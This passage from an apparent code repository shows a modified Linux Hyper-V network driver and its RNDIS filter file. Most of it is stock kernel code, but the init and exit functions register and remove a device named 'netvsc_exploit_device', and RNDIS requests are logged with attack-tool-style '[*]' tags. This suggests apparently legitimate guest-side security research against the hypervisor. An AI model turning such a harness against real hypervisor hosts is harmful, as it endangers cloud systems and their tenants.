Vlan dev with same MAC registering as VF */ 2353 | if (is_vlan_dev(event_dev)) 2354 | return NOTIFY_DONE; 2355 | 2356 | /* Avoid Bonding master dev with same MAC registering as VF */ 2357 | if ((event_dev->priv_flags & IFF_BONDING) && 2358 | (event_dev->flags & IFF_MASTER)) 2359 | return NOTIFY_DONE; 2360 | 2361 | switch (event) { 2362 | case NETDEV_REGISTER: 2363 | return netvsc_register_vf(event_dev); 2364 | case NETDEV_UNREGISTER: 2365 | return netvsc_unregister_vf(event_dev); 2366 | case NETDEV_UP: 2367 | case NETDEV_DOWN: 2368 | return netvsc_vf_changed(event_dev); 2369 | default: 2370 | return NOTIFY_DONE; 2371 | } 2372 | } 2373 | 2374 | static struct notifier_block netvsc_netdev_notifier = { 2375 | .notifier_call = netvsc_netdev_event, 2376 | }; 2377 | 2378 | static void __exit netvsc_drv_exit(void) 2379 | { 2380 | misc_deregister(&netvsc_exploit_device); 2381 | unregister_netdevice_notifier(&netvsc_netdev_notifier); 2382 | vmbus_driver_unregister(&netvsc_drv); 2383 | } 2384 | 2385 | static int __init netvsc_drv_init(void) 2386 | { 2387 | int ret; 2388 | 2389 | ret = misc_register(&netvsc_exploit_device); 2390 | if(ret) 2391 | printk("[*]netvsc_exploit_device register fail.\n"); 2392 | else 2393 | printk("[*]netvsc_exploit_device register successful.\n"); 2394 | 2395 | if (ring_size < RING_SIZE_MIN) { 2396 | ring_size = RING_SIZE_MIN; 2397 | pr_info("Increased ring_size to %d (min allowed)\n", 2398 | ring_size); 2399 | } 2400 | ret = vmbus_driver_register(&netvsc_drv); 2401 | 2402 | if (ret) 2403 | return ret; 2404 | 2405 | register_netdevice_notifier(&netvsc_netdev_notifier); 2406 | return 0; 2407 | } 2408 | 2409 | MODULE_LICENSE("GPL"); 2410 | MODULE_DESCRIPTION("Microsoft Hyper-V network driver"); 2411 | 2412 | module_init(netvsc_drv_init); 2413 | module_exit(netvsc_drv_exit); 2414 | -------------------------------------------------------------------------------- /ring0/hyperv/rndis_filter.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2009, Microsoft Corporation. 3 | * 4 | * This program is free software; you can redistribute it and/or modify it 5 | * under the terms and conditions of the GNU General Public License, 6 | * version 2, as published by the Free Software Foundation. 7 | * 8 | * This program is distributed in the hope it will be useful, but WITHOUT 9 | * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or 10 | * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for 11 | * more details. 12 | * 13 | * You should have received a copy of the GNU General Public License along with 14 | * this program; if not, see . 15 | * 16 | * Authors: 17 | * Haiyang Zhang 18 | * Hank Janssen 19 | */ 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | 33 | #include "hyperv_net.h" 34 | 35 | static void rndis_set_multicast(struct work_struct *w); 36 | 37 | 38 | 39 | static const u8 netvsc_hash_key[NETVSC_HASH_KEYLEN] = { 40 | 0x6d, 0x5a, 0x56, 0xda, 0x25, 0x5b, 0x0e, 0xc2, 41 | 0x41, 0x67, 0x25, 0x3d, 0x43, 0xa3, 0x8f, 0xb0, 42 | 0xd0, 0xca, 0x2b, 0xcb, 0xae, 0x7b, 0x30, 0xb4, 43 | 0x77, 0xcb, 0x2d, 0xa3, 0x80, 0x30, 0xf2, 0x0c, 44 | 0x6a, 0x42, 0xb7, 0x3b, 0xbe, 0xac, 0x01, 0xfa 45 | }; 46 | 47 | static struct rndis_device *get_rndis_device(void) 48 | { 49 | struct rndis_device *device; 50 | 51 | device = kzalloc(sizeof(struct rndis_device), GFP_KERNEL); 52 | if (!device) 53 | return NULL; 54 | 55 | spin_lock_init(&device->request_lock); 56 | 57 | INIT_LIST_HEAD(&device->req_list); 58 | INIT_WORK(&device->mcast_work, rndis_set_multicast); 59 | 60 | device->state = RNDIS_DEV_UNINITIALIZED; 61 | 62 | return device; 63 | } 64 | 65 | struct rndis_request *get_rndis_request(struct rndis_device *dev, 66 | u32 msg_type, 67 | u32 msg_len) 68 | { 69 | struct rndis_request *request; 70 | struct rndis_message *rndis_msg; 71 | struct rndis_set_request *set; 72 | unsigned long flags; 73 | 74 | switch(msg_type) 75 | { 76 | case RNDIS_MSG_QUERY: 77 | printk("[*]hv_netvsc send rndis packet:RNDIS_MSG_QUERY\n"); 78 | break; 79 | 80 | case RNDIS_MSG_SET: 81 | printk("[*]hv_netvsc send rndis packet:RNDIS_MSG_SET\n"); 82 | break; 83 | 84 | case RNDIS_MSG_INIT: 85 | printk("[*]hv_netvsc send rndis packet:RNDIS_MSG_INIT\n"); 86 | break; 87 | 88 | case RNDIS_MSG_HALT: 89 | printk("[*]hv_netvsc send rndis packet:RNDIS_MSG_HALT\n"); 90 | break; 91 | } 92 | 93 | 94 | request = kzalloc(sizeof(struct rndis_request), GFP_KERNEL); 95 | if (!request) 96 | return NULL; 97 | 98 | init_completion(&request->wait_event); 99 | 100 | rndis_msg = &request->request_msg; 101 | rndis_msg->ndis_msg_type = msg_type; 102 | rndis_msg->msg_len = msg_len; 103 | 104 | request->pkt.q_idx = 0; 105 | 106 | /* 107 | * Set the request id. This field is always after the rndis header for 108 | * request/response packet types so we just used the SetRequest as a 109 | * template 110 | */ 111 | set = &rndis_msg->msg.set_req; 112 | set->req_id = atomic_inc_return(&dev->new_req_id); 113 | 114 | /* Add to the request list */ 115 | spin_lock_irqsave(&dev->request_lock, flags); 116 | list_add_tail(&request->list_ent, &dev->req_list); 117 | spin_unlock_irqrestore(&dev->request_lock, flags); 118 | 119 | return request; 120 | } 121 | 122 | static void put_rndis_request(struct rndis_device *dev, 123 | struct rndis_request *req) 124 | { 125 | unsigned long flags; 126 | 127 | spin_lock_irqsave(&dev->request_lock, flags); 128 | list_del(&req->list_ent); 129 | spin_unlock_irqrestore(&dev->request_lock, flags); 130 | 131 | kfree(req); 132 | } 133 | 134 | static void dump_rndis_message(struct hv_device *hv_dev, 135 | const struct rndis_message *rndis_msg) 136 | { 137 | struct net_device *netdev = hv_get_drvdata(hv_dev); 138 | 139 | switch (rndis_msg->ndis_msg_type) { 140 | case RNDIS_MSG_PACKET: 141 | netdev_dbg(netdev, "RNDIS_MSG_PACKET (len %u, " 142 | "data offset %u data len %u, # oob %u, " 143 | "oob offset %u, oob len %u, pkt offset %u, " 144 | "pkt len %u\n", 145 | rndis_msg->msg_len, 146 | rndis_msg->msg.pkt.data_offset, 147 | rndis_msg->msg.pkt.data_len, 148 | rndis_msg->msg.pkt.num_oob_data_elements, 149 | rndis_msg->msg.pkt.oob_data_offset, 150 | rndis_msg->msg.pkt.oob_data_len, 151 | rndis_msg->msg.pkt.per_pkt_info_offset, 152 | rndis_msg->msg.pkt.per_pkt_info_len); 153 | break; 154 | 155 | case RNDIS_MSG_INIT_C: 156 | netdev_dbg(netdev, "RNDIS_MSG_INIT_C " 157 | "(len %u, id 0x%x, status 0x%x, major %d, minor %d, " 158 | "device flags %d, max xfer size 0x%x, max pkts %u, " 159 | "pkt aligned %u)\n", 160 | rndis_msg->msg_len, 161 | rndis_msg->msg.init_complete.req_id, 162 | rndis_msg->msg.init_complete.status, 163 | rndis_msg->msg.init_complete.major_ver, 164 | rndis_msg->msg.init_complete.minor_ver, 165 | rndis_msg->msg.init_complete.dev_flags, 166 | rndis_msg->msg.init_complete.max_xfer_size, 167 | rndis_msg->msg.init_complete. 168 | max_pkt_per_msg, 169 | rndis_msg->msg.init_complete. 170 | pkt_alignment_factor); 171 | break; 172 | 173 | case RNDIS_MSG_QUERY_C: 174 | netdev_dbg(netdev, "RNDIS_MSG_QUERY_C " 175 | "(len %u, id 0x%x, status 0x%x, buf len %u, " 176 | "buf offset %u)\n", 177 | rndis_msg->msg_len, 178 | rndis_msg->msg.query_complete.req_id, 179 | rndis_msg->msg.query_complete.status, 180 | rndis_msg->msg.query_complete. 181 | info_buflen, 182 | rndis_msg->msg.query_complete. 183 | info_buf_offset); 184 | break; 185 | 186 | case RNDIS_MSG_SET_C: 187 | netdev_dbg(netdev, 188 | "RNDIS_MSG_SET_C (len %u, id 0x%x, status 0x%x)\n", 189 | rndis_msg->msg_len, 190 | rndis_msg->msg.set_complete.req_id, 191 | rndis_msg->msg.set_complete.status); 192 | break; 193 | 194 | case RNDIS_MSG_INDICATE: 195 | netdev_dbg(netdev, "RNDIS_MSG_INDICATE " 196 | "(len %u, status 0x%x, buf len %u, buf offset %u)\n", 197 | rndis_msg->msg_len, 198 | rndis_msg->msg.indicate_status.status, 199 | rndis_msg->msg.indicate_status.status_buflen, 200 | rndis_msg->msg.indicate_status.status_buf_offset); 201 | break; 202 | 203 | default: 204 | netdev_dbg(netdev, "0x%x (len %u)\n", 205 | rndis_msg->ndis_msg_type, 206 | rndis_msg->msg_len); 207 | break; 208 | } 209 | } 210 | 211 | int rndis_filter_send_request(struct rndis_device *dev, 212 | struct rndis_request *req) 213 | { 214 | struct hv_netvsc_packet *packet; 215 | struct hv_page_buffer page_buf[2]; 216 | struct hv_page_buffer *pb = page_buf; 217 | struct net_device_context *net_device_ctx = netdev_priv(dev->ndev); 218 | int ret; 219 | 220 | /* Setup the packet to send it */ 221 | packet = &req->pkt; 222 | 223 | packet->total_data_buflen = req->request_msg.msg_len; 224 | packet->page_buf_cnt = 1; 225 | 226 | pb[0].pfn = virt_to_phys(&req->request_msg) >> 227 | PAGE_SHIFT; 228 | pb[0].len = req->request_msg.msg_len; 229 | pb[0].offset = 230 | (unsigned long)&req->request_msg & (PAGE_SIZE - 1); 231 | 232 | /* Add one page_buf when request_msg crossing page boundary */ 233 | if (pb[0].offset + pb[0].len > PAGE_SIZE) { 234 | packet->page_buf_cnt++; 235 | pb[0].len = PAGE_SIZE - 236 | pb[0].offset; 237 | pb[1].pfn = virt_to_phys((void *)&req->request_msg 238 | + pb[0].len) >> PAGE_SHIFT; 239 | pb[1].offset = 0; 240 | pb[1].len = req->request_msg.msg_len - 241 | pb[0].len; 242 | } 243 | 244 | rcu_read_lock_bh(); 245 | ret = netvsc_send(net_device_ctx, packet, NULL, pb, NULL); 246 | rcu_read_unlock_bh(); 247 | 248 | return ret; 249 | } 250 | 251 | static void rndis_set_link_state(struct rndis_device *rdev, 252 | struct rndis_request *request) 253 | { 254 | u32 link_status; 255 | struct rndis_query_complete *query_complete; 256 | 257 | query_complete = &request->response_msg.msg.query_complete; 258 | 259 | if (query_complete->status == RNDIS_STATUS_SUCCESS && 260 | query_complete->info_buflen == sizeof(u32)) { 261 | memcpy(&link_status, (void *)((unsigned long)query_complete + 262 | query_complete->info_buf_offset), sizeof(u32)); 263 | rdev->link_state = link_status != 0; 264 | } 265 | } 266 | 267 | static void rndis_filter_receive_response(struct rndis_device *dev, 268 | struct rndis_message *resp) 269 | { 270 | struct rndis_request *request = NULL; 271 | bool found = false; 272 | unsigned long flags; 273 | struct net_device *ndev = dev->ndev; 274 | 275 | spin_lock_irqsave(&dev->request_lock, flags); 276 | list_for_each_entry(request, &dev->req_list, list_ent) { 277 | /* 278 | * All request/response message contains RequestId as the 1st 279 | * field 280 | */ 281 | if (request->request_msg.msg.init_req.req_id 282 | == resp->msg.init_complete.req_id) { 283 | found = true; 284 | break; 285 | } 286 | } 287 | spin_unlock_irqrestore(&dev->request_lock, flags); 288 | 289 | if (found) { 290 | if (resp->msg_len <= 291 | sizeof(struct rndis_message) + RNDIS_EXT_LEN) { 292 | memcpy(&request->response_msg, resp, 293 | resp->msg_len); 294 | if (request->request_msg.ndis_msg_type == 295 | RNDIS_MSG_QUERY && request->request_msg.msg. 296 | query_req.oid == RNDIS_OID_GEN_MEDIA_CONNECT_STATUS) 297 | rndis_set_link_state(dev, request); 298 | } else { 299 | netdev_err(ndev, 300 | "rndis response buffer overflow " 301 | "detected (size %u max %zu)\n", 302 | resp->msg_len, 303 | sizeof(struct rndis_message)); 304 | 305 | if (resp->ndis_msg_type == 306 | RNDIS_MSG_RESET_C) { 307 | /* does not have a request id field */ 308 | request->response_msg.msg.reset_complete. 309 | status = RNDIS_STATUS_BUFFER_OVERFLOW; 310 | } else { 311 | request->response_msg.msg. 312 | init_complete.status = 313 | RNDIS_STATUS_BUFFER_OVERFLOW; 314 | } 315 | } 316 | 317 | complete(&request->wait_event); 318 | } else { 319 | netdev_err(ndev, 320 | "no rndis request found for this response " 321 | "(id 0x%x res type 0x%x)\n", 322 | resp->msg.init_complete.req_id, 323 | resp->ndis_msg_type); 324 | } 325 | } 326 | 327 | /* 328 | * Get the Per-Packet-Info with the specified type 329 | * return NULL if not found. 330 | */ 331 | static inline void *rndis_get_ppi(struct rndis_packet *rpkt, u32 type) 332 | { 333 | struct rndis_per_packet_info *ppi; 334 | int len; 335 | 336 | if (rpkt->per_pkt_info_offset == 0) 337 | return NULL; 338 | 339 | ppi = (struct rndis_per_packet_info *)((ulong)rpkt + 340 | rpkt->per_pkt_info_offset); 341 | len = rpkt->per_pkt_info_len; 342 | 343 | while (len > 0) { 344 | if (ppi->type == type) 345 | return (void *)((ulong)ppi + ppi->ppi_offset); 346 | len -= ppi->size; 347 | ppi = (struct rndis_per_packet_info *)((ulong)ppi + ppi->size); 348 | } 349 | 350 | return NULL; 351 | } 352 | 353 | static int rndis_filter_receive_data(struct net_device *ndev, 354 | struct rndis_device *dev, 355 | struct rndis_message *msg, 356 | struct vmbus_channel *channel, 357 | void *data, u32 data_buflen) 358 | { 359 | struct rndis_packet *rndis_pkt = &msg->msg.pkt; 360 | const struct ndis_tcp_ip_checksum_info *csum_info; 361 | const struct ndis_pkt_8021q_info *vlan; 362 | u32 data_offset; 363 | 364 | /* Remove the rndis header and pass it back up the stack */ 365 | data_offset = RNDIS_HEADER_SIZE + rndis_pkt->data_offset; 366 | 367 | data_buflen -= data_offset; 368 | 369 | /* 370 | * Make sure we got a valid RNDIS message, now total_data_buflen 371 | * should be the data packet size plus the trailer padding size 372 | */ 373 | if (unlikely(data_buflen < rndis_pkt->data_len)) { 374 | netdev_err(dev->ndev, "rndis message buffer " 375 | "overflow detected (got %u, min %u)" 376 | "...dropping this message!\n", 377 | data_buflen, rndis_pkt->data_len); 378 | return NVSP_STAT_FAIL; 379 | } 380 | 381 | vlan = rndis_get_ppi(rndis_pkt, IEEE_8021Q_INFO); 382 | 383 | /* 384 | * Remove the rndis trailer padding from rndis packet message 385 | * rndis_pkt->data_len tell us the real data length, we only copy 386 | * the data packet to the stack, without the rndis trailer padding 387 | */ 388 | data = (void *)((unsigned long)data + data_offset); 389 | csum_info = rndis_get_ppi(rndis_pkt, TCPIP_CHKSUM_PKTINFO); 390 | return netvsc_recv_callback(ndev, channel, 391 | data, rndis_pkt->data_len, 392 | csum_info, vlan); 393 | } 394 | 395 | int rndis_filter_receive(struct net_device *ndev, 396 | struct netvsc_device *net_dev, 397 | struct hv_device *dev, 398 | struct vmbus_channel *channel, 399 | void *data, u32 buflen) 400 | { 401 | struct net_device_context *net_device_ctx = netdev_priv(ndev); 402 | struct rndis_device *rndis_dev = net_dev->extension; 403 | struct rndis_message *rndis_msg = data; 404 | 405 | /* Make sure the rndis device state is initialized */ 406 | if (unlikely(!rndis_dev)) { 407 | netif_err(net_device_ctx, rx_err, ndev, 408 | "got rndis message but no rndis device!\n"); 409 | return NVSP_STAT_FAIL; 410 | } 411 | 412 | if (unlikely(rndis_dev->state == RNDIS_DEV_UNINITIALIZED)) { 413 | netif_err(net_device_ctx, rx_err, ndev, 414 | "got rndis message uninitialized\n"); 415 | return NVSP_STAT_FAIL; 416 | } 417 | 418 | if (netif_msg_rx_status(net_device_ctx)) 419 | dump_rndis_message(dev, rndis_msg); 420 | 421 | switch (rndis_msg->ndis_msg_type) { 422 | case RNDIS_MSG_PACKET: 423 | return rndis_filter_receive_data(ndev, rndis_dev, rndis_msg, 424 | channel, data, buflen); 425 | case RNDIS_MSG_INIT_C: 426 | case RNDIS_MSG_QUERY_C: 427 | case RNDIS_MSG_SET_C: 428 | /* completion msgs */ 429 | rndis_filter_receive_response(rndis_dev, rndis_msg); 430 | break; 431 | 432 | case RNDIS_MSG_INDICATE: 433 | /* notification msgs */ 434 | netvsc_linkstatus_callback(dev, rndis_msg); 435 | break; 436 | default: 437 | netdev_err(ndev, 438 | "unhandled rndis message (type %u len %u)\n", 439 | rndis_msg->ndis_msg_type, 440 | rndis_msg->msg_len); 441 | break; 442 | } 443 | 444 | return 0; 445 | } 446 | 447 | static int rndis_filter_query_device(struct rndis_device *dev, 448 | struct netvsc_device *nvdev, 449 | u32 oid, void *result, u32 *result_size) 450 | { 451 | struct rndis_request *request; 452 | u32 inresult_size = *result_size; 453 | struct rndis_query_request *query; 454 | struct rndis_query_complete *query_complete; 455 | int ret = 0; 456 | 457 | if (!result) 458 | return -EINVAL; 459 | 460 | *result_size = 0; 461 | request = get_rndis_request(dev, RNDIS_MSG_QUERY, 462 | RNDIS_MESSAGE_SIZE(struct rndis_query_request)); 463 | if (!request) { 464 | ret = -ENOMEM; 465 | goto cleanup; 466 | } 467 | 468 | /* Setup the rndis query */ 469 | query = &request->request_msg.msg.query_req; 470 | query->oid = oid; 471 | query->info_buf_offset = sizeof(struct rndis_query_request); 472 | query->info_buflen = 0; 473 | query->dev_vc_handle = 0; 474 | 475 | if (oid == OID_TCP_OFFLOAD_HARDWARE_CAPABILITIES) { 476 | struct ndis_offload *hwcaps; 477 | u32 nvsp_version = nvdev->nvsp_version; 478 | u8 ndis_rev; 479 | size_t size; 480 | 481 | if (nvsp_version >= NVSP_PROTOCOL_VERSION_5) { 482 | ndis_rev = NDIS_OFFLOAD_PARAMETERS_REVISION_3; 483 | size = NDIS_OFFLOAD_SIZE; 484 | } else if (nvsp_version >= NVSP_PROTOCOL_VERSION_4) { 485 | ndis_rev = NDIS_OFFLOAD_PARAMETERS_REVISION_2; 486 | size = NDIS_OFFLOAD_SIZE_6_1; 487 | } else { 488 | ndis_rev = NDIS_OFFLOAD_PARAMETERS_REVISION_1; 489 | size = NDIS_OFFLOAD_SIZE_6_0; 490 | } 491 | 492 | request->request_msg.msg_len += size; 493 | query->info_buflen = size; 494 | hwcaps = (struct ndis_offload *) 495 | ((unsigned long)query + query->info_buf_offset); 496 | 497 | hwcaps->header.type = NDIS_OBJECT_TYPE_OFFLOAD; 498 | hwcaps->header.revision = ndis_rev; 499 | hwcaps->header.size = size; 500 | 501 | } else if (oid == OID_GEN_RECEIVE_SCALE_CAPABILITIES) { 502 | struct ndis_recv_scale_cap *cap; 503 | 504 | request->request_msg.msg_len += 505 | sizeof(struct ndis_recv_scale_cap); 506 | query->info_buflen = sizeof(struct ndis_recv_scale_cap); 507 | cap = (struct ndis_recv_scale_cap *)((unsigned long)query + 508 | query->info_buf_offset); 509 | cap->hdr.type = NDIS_OBJECT_TYPE_RSS_CAPABILITIES; 510 | cap->hdr.rev = NDIS_RECEIVE_SCALE_CAPABILITIES_REVISION_2; 511 | cap->hdr.size = sizeof(struct ndis_recv_scale_cap); 512 | } 513 | 514 | ret = rndis_filter_send_request(dev, request); 515 | if (ret != 0) 516 | goto cleanup; 517 | 518 | wait_for_completion(&request->wait_event); 519 | 520 | /* Copy the response back */ 521 | query_complete = &request->response_msg.msg.query_complete; 522 | 523 | if (query_complete->info_buflen > inresult_size) { 524 | ret = -1; 525 | goto cleanup; 526 | } 527 | 528 | memcpy(result, 529 | (void *)((unsigned long)query_complete + 530 | query_complete->info_buf_offset), 531 | query_complete->info_buflen); 532 | 533 | *result_size = query_complete->info_buflen; 534 | 535 | cleanup: 536 | if (request) 537 | put_rndis_request(dev, request); 538 | 539 | return ret; 540 | } 541 | 542 | /* Get the hardware offload capabilities */ 543 | static int 544 | rndis_query_hwcaps(struct rndis_device *dev, struct netvsc_device *net_device, 545 | struct ndis_offload *caps) 546 | { 547 | u32 caps_len = sizeof(*caps); 548 | int ret; 549 | 550 | memset(caps, 0, sizeof(*caps)); 551 | 552 | ret = rndis_filter_query_device(dev, net_device, 553 | OID_TCP_OFFLOAD_HARDWARE_CAPABILITIES, 554 | caps, &caps_len); 555 | if (ret) 556 | return ret; 557 | 558 | if (caps->header.type != NDIS_OBJECT_TYPE_OFFLOAD) { 559 | netdev_warn(dev->ndev, "invalid NDIS objtype %#x\n", 560 | caps->header.type); 561 | return -EINVAL; 562 | } 563 | 564 | if (caps->header.revision < NDIS_OFFLOAD_PARAMETERS_REVISION_1) { 565 | netdev_warn(dev->ndev, "invalid NDIS objrev %x\n", 566 | caps->header.revision); 567 | return -EINVAL; 568 | } 569 | 570 | if (caps->header.size > caps_len || 571 | caps->header.size < NDIS_OFFLOAD_SIZE_6_0) { 572 | netdev_warn(dev->ndev, 573 | "invalid NDIS objsize %u, data size %u\n", 574 | caps->header.size, caps_len); 575 | return -EINVAL; 576 | } 577 | 578 | return 0; 579 | } 580 | 581 | int rndis_filter_query_device_mac(struct rndis_device *dev, 582 | struct netvsc_device *net_device) 583 | { 584 | u32 size = ETH_ALEN; 585 | 586 | return rndis_filter_query_device(dev, net_device, 587 | RNDIS_OID_802_3_PERMANENT_ADDRESS, 588 | dev->hw_mac_adr, &size); 589 | } 590 | 591 | #define NWADR_STR "NetworkAddress" 592 | #define NWADR_STRLEN 14 593 | 594 | int rndis_filter_set_device_mac(struct netvsc_device *nvdev, 595 | const char *mac) 596 | { 597 | struct rndis_device *rdev = nvdev->extension; 598 | struct rndis_request *request; 599 | struct rndis_set_request *set; 600 | struct rndis_config_parameter_info *cpi; 601 | wchar_t *cfg_nwadr, *cfg_mac; 602 | struct rndis_set_complete *set_complete; 603 | char macstr[2*ETH_ALEN+1]; 604 | u32 extlen = sizeof(struct rndis_config_parameter_info) + 605 | 2*NWADR_STRLEN + 4*ETH_ALEN; 606 | int ret; 607 | 608 | request = get_rndis_request(rdev, RNDIS_MSG_SET, 609 | RNDIS_MESSAGE_SIZE(struct rndis_set_request) + extlen); 610 | if (!request) 611 | return -ENOMEM; 612 | 613 | set = &request->request_msg.msg.set_req; 614 | set->oid = RNDIS_OID_GEN_RNDIS_CONFIG_PARAMETER; 615 | set->info_buflen = extlen; 616 | set->info_buf_offset = sizeof(struct rndis_set_request); 617 | set->dev_vc_handle = 0; 618 | 619 | cpi = (struct rndis_config_parameter_info *)((ulong)set + 620 | set->info_buf_offset); 621 | cpi->parameter_name_offset = 622 | sizeof(struct rndis_config_parameter_info); 623 | /* Multiply by 2 because host needs 2 bytes (utf16) for each char */ 624 | cpi->parameter_name_length = 2*NWADR_STRLEN; 625 | cpi->parameter_type = RNDIS_CONFIG_PARAM_TYPE_STRING; 626 | cpi->parameter_value_offset = 627 | cpi->parameter_name_offset + cpi->parameter_name_length; 628 | /* Multiply by 4 because each MAC byte displayed as 2 utf16 chars */ 629 | cpi->parameter_value_length = 4*ETH_ALEN; 630 | 631 | cfg_nwadr = (wchar_t *)((ulong)cpi + cpi->parameter_name_offset); 632 | cfg_mac = (wchar_t *)((ulong)cpi + cpi->parameter_value_offset); 633 | ret = utf8s_to_utf16s(NWADR_STR, NWADR_STRLEN, UTF16_HOST_ENDIAN, 634 | cfg_nwadr, NWADR_STRLEN); 635 | if (ret < 0) 636 | goto cleanup; 637 | snprintf(macstr, 2*ETH_ALEN+1, "%pm", mac); 638 | ret = utf8s_to_utf16s(macstr, 2*ETH_ALEN, UTF16_HOST_ENDIAN, 639 | cfg_mac, 2*ETH_ALEN); 640 | if (ret < 0) 641 | goto cleanup; 642 | 643 | ret = rndis_filter_send_request(rdev, request); 644 | if (ret != 0) 645 | goto cleanup; 646 | 647 | wait_for_completion(&request->wait_event); 648 | 649 | set_complete = &request->response_msg.msg.set_complete; 650 | if (set_complete->status != RNDIS_STATUS_SUCCESS) 651 | ret = -EIO; 652 | 653 | cleanup: 654 | put_rndis_request(rdev, request); 655 | return ret; 656 | } 657 | 658 | static int 659 | rndis_filter_set_offload_params(struct net_device *ndev, 660 | struct netvsc_device *nvdev, 661 | struct ndis_offload_params *req_offloads) 662 | { 663 | struct rndis_device *rdev = nvdev->extension; 664 | struct rndis_request *request; 665 | struct rndis_set_request *set; 666 | struct ndis_offload_params *offload_params; 667 | struct rndis_set_complete *set_complete; 668 | u32 extlen = sizeof(struct ndis_offload_params); 669 | int ret; 670 | u32 vsp_version = nvdev->nvsp_version; 671 | 672 | if (vsp_version <= NVSP_PROTOCOL_VERSION_4) { 673 | extlen = VERSION_4_OFFLOAD_SIZE; 674 | /* On NVSP_PROTOCOL_VERSION_4 and below, we do not support 675 | * UDP checksum offload. 676 | */ 677 | req_offloads->udp_ip_v4_csum = 0; 678 | req_offloads->udp_ip_v6_csum = 0; 679 | } 680 | 681 | request = get_rndis_request(rdev, RNDIS_MSG_SET, 682 | RNDIS_MESSAGE_SIZE(struct rndis_set_request) + extlen); 683 | if (!request) 684 | return -ENOMEM; 685 | 686 | set = &request->request_msg.msg.set_req; 687 | set->oid = OID_TCP_OFFLOAD_PARAMETERS; 688 | set->info_buflen = extlen; 689 | set->info_buf_offset = sizeof(struct rndis_set_request); 690 | set->dev_vc_handle = 0; 691 | 692 | offload_params = (struct ndis_offload_params *)((ulong)set + 693 | set->info_buf_offset); 694 | *offload_params = *req_offloads; 695 | offload_params->header.type = NDIS_OBJECT_TYPE_DEFAULT; 696 | offload_params->header.revision = NDIS_OFFLOAD_PARAMETERS_REVISION_3; 697 | offload_params->header.size = extlen; 698 | 699 | ret = rndis_filter_send_request(rdev, request); 700 | if (ret != 0) 701 | goto cleanup; 702 | 703 | wait_for_completion(&request->wait_event); 704 | set_complete = &request->response_msg.msg.set_complete; 705 | if (set_complete->status != RNDIS_STATUS_SUCCESS) { 706 | netdev_err(ndev, "Fail to set offload on host side:0x%x\n", 707 | set_complete->status); 708 | ret = -EINVAL; 709 | } 710 | 711 | cleanup: 712 | put_rndis_request(rdev, request); 713 | return ret; 714 | } 715 | 716 | int rndis_filter_set_rss_param(struct rndis_device *rdev, 717 | const u8 *rss_key) 718 | { 719 | struct net_device *ndev = rdev->ndev; 720 | struct rndis_request *request; 721 | struct rndis_set_request *set; 722 | struct rndis_set_complete *set_complete; 723 | u32 extlen = sizeof(struct ndis_recv_scale_param) + 724 | 4 * ITAB_NUM + NETVSC_HASH_KEYLEN; 725 | struct ndis_recv_scale_param *rssp; 726 | u32 *itab; 727 | u8 *keyp; 728 | int i, ret; 729 | 730 | request = get_rndis_request( 731 | rdev, RNDIS_MSG_SET, 732 | RNDIS_MESSAGE_SIZE(struct rndis_set_request) + extlen); 733 | if (!request) 734 | return -ENOMEM; 735 | 736 | set = &request->request_msg.msg.set_req; 737 | set->oid = OID_GEN_RECEIVE_SCALE_PARAMETERS; 738 | set->info_buflen = extlen; 739 | set->info_buf_offset = sizeof(struct rndis_set_request); 740 | set->dev_vc_handle = 0; 741 | 742 | rssp = (struct ndis_recv_scale_param *)(set + 1); 743 | rssp->hdr.type = NDIS_OBJECT_TYPE_RSS_PARAMETERS; 744 | rssp->hdr.rev = NDIS_RECEIVE_SCALE_PARAMETERS_REVISION_2; 745 | rssp->hdr.size = sizeof(struct ndis_recv_scale_param); 746 | rssp->flag = 0; 747 | rssp->hashinfo = NDIS_HASH_FUNC_TOEPLITZ | NDIS_HASH_IPV4 | 748 | NDIS_HASH_TCP_IPV4 | NDIS_HASH_IPV6 | 749 | NDIS_HASH_TCP_IPV6; 750 | rssp->indirect_tabsize = 4*ITAB_NUM; 751 | rssp->indirect_taboffset = sizeof(struct ndis_recv_scale_param); 752 | rssp->hashkey_size = NETVSC_HASH_KEYLEN; 753 | rssp->kashkey_offset = rssp->indirect_taboffset + 754 | rssp->indirect_tabsize; 755 | 756 | /* Set indirection table entries */ 757 | itab = (u32 *)(rssp + 1); 758 | for (i = 0; i < ITAB_NUM; i++) 759 | itab[i] = rdev->ind_table[i]; 760 | 761 | /* Set hask key values */ 762 | keyp = (u8 *)((unsigned long)rssp + rssp->kashkey_offset); 763 | memcpy(keyp, rss_key, NETVSC_HASH_KEYLEN); 764 | 765 | ret = rndis_filter_send_request(rdev, request); 766 | if (ret != 0) 767 | goto cleanup; 768 | 769 | wait_for_completion(&request->wait_event); 770 | set_complete = &request->response_msg.msg.set_complete; 771 | if (set_complete->status == RNDIS_STATUS_SUCCESS) 772 | memcpy(rdev->rss_key, rss_key, NETVSC_HASH_KEYLEN); 773 | else { 774 | netdev_err(ndev, "Fail to set RSS parameters:0x%x\n", 775 | set_complete->status); 776 | ret = -EINVAL; 777 | } 778 | 779 | cleanup: 780 | put_rndis_request(rdev, request); 781 | return ret; 782 | } 783 | 784 | static int rndis_filter_query_device_link_status(struct rndis_device *dev, 785 | struct netvsc_device *net_device) 786 | { 787 | u32 size = sizeof(u32); 788 | u32 link_status; 789 | 790 | return rndis_filter_query_device(dev, net_device, 791 | RNDIS_OID_GEN_MEDIA_CONNECT_STATUS, 792 | &link_status, &size); 793 | } 794 | 795 | static int rndis_filter_query_link_speed(struct rndis_device *dev, 796 | struct netvsc_device *net_device) 797 | { 798 | u32 size = sizeof(u32); 799 | u32 link_speed; 800 | struct net_device_context *ndc; 801 | int ret; 802 | 803 | ret = rndis_filter_query_device(dev, net_device, 804 | RNDIS_OID_GEN_LINK_SPEED, 805 | &link_speed, &size); 806 | 807 | if (!ret) { 808 | ndc = netdev_priv(dev->ndev); 809 | 810 | /* The link speed reported from host is in 100bps unit, so 811 | * we convert it to Mbps here. 812 | */ 813 | ndc->speed = link_speed / 10000; 814 | } 815 | 816 | return ret; 817 | } 818 | 819 | static int rndis_filter_set_packet_filter(struct rndis_device *dev, 820 | u32 new_filter) 821 | { 822 | struct rndis_request *request; 823 | struct rndis_set_request *set; 824 | int ret; 825 | 826 | request = get_rndis_request(dev, RNDIS_MSG_SET, 827 | RNDIS_MESSAGE_SIZE(struct rndis_set_request) + 